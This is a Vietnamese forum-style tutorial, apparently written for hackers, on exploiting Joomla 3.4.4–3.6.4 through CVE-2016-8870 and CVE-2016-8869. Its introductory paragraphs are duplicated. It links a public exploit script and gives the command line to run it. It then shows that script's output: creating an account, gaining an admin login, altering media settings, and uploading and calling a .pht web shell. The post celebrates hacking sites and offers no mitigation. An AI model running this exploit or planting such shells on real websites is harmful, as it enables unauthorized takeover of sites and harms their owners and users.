Exploit Joomla 3.4.4 - 3.6.4 với Shell
Năm nay thật là cái năm vui vcl đối với tất cả các anh em khi cả Linux và mã nguồn mở Joomla đều ăn lỗi Khủng , hnay mình sẽ hướng dẫn Exploit Joomla
Hai lỗ hổng nghiêm trọng, cả hai tồn tại trong các chức năng Joomla Core, bao gồm tổn Account Creation ( CVE-2016-8870 ) và ( CVE-2016-8869 ) , nếu chưa được vá, có thể đưa hàng triệu trang web chạy trên Joomla bị Hack là điều đương nhiên !!
các lỗi tạo tài khoản có thể cho phép bất kỳ người dùng đăng ký trên trang web, thậm chí nếu quá trình đăng ký đã bị vô hiệu bởi Admin , trong khi các lỗ hổng cao có thể cho phép người dùng thực hiện các chức năng tiên tiến trên một trang web đăng ký mà người dùng bình thường !!
Và đây là hướng dẫn
DOWNLOAD: https://github.com/XiphosResearch/exploits/tree/master/Joomraa
Tải nó về rồi chạy dòng lệnh
Hai lỗ hổng nghiêm trọng, cả hai tồn tại trong các chức năng Joomla Core, bao gồm tổn Account Creation ( CVE-2016-8870 ) và ( CVE-2016-8869 ) , nếu chưa được vá, có thể đưa hàng triệu trang web chạy trên Joomla bị Hack là điều đương nhiên !!
các lỗi tạo tài khoản có thể cho phép bất kỳ người dùng đăng ký trên trang web, thậm chí nếu quá trình đăng ký đã bị vô hiệu bởi Admin , trong khi các lỗ hổng cao có thể cho phép người dùng thực hiện các chức năng tiên tiến trên một trang web đăng ký mà người dùng bình thường !!
Và đây là hướng dẫn
DOWNLOAD: https://github.com/XiphosResearch/exploits/tree/master/Joomraa
Tải nó về rồi chạy dòng lệnh
$ ./joomraa.py -u hacker -p password -e hacker@example.com http://localhost:8080/joomla
Vài chỗ cần edit trên lệnh thì ae biết r nha !!
[-] Getting token
[-] Creating user account
[-] Getting token for admin login
[-] Logging in to admin
[+] Admin Login Success!
[+] Getting media options
[+] Setting media options
[*] Uploading exploit.pht
[*] Uploading exploit to: http://localhost:8080/joomla/images/OGBUHCF5F.pht
[*] Calling exploit
[$] Exploit Successful!
[*] SUCCESS: http://localhost:8080/joomla
PHẦN Email or http ý :))
ENJOYS :!!!!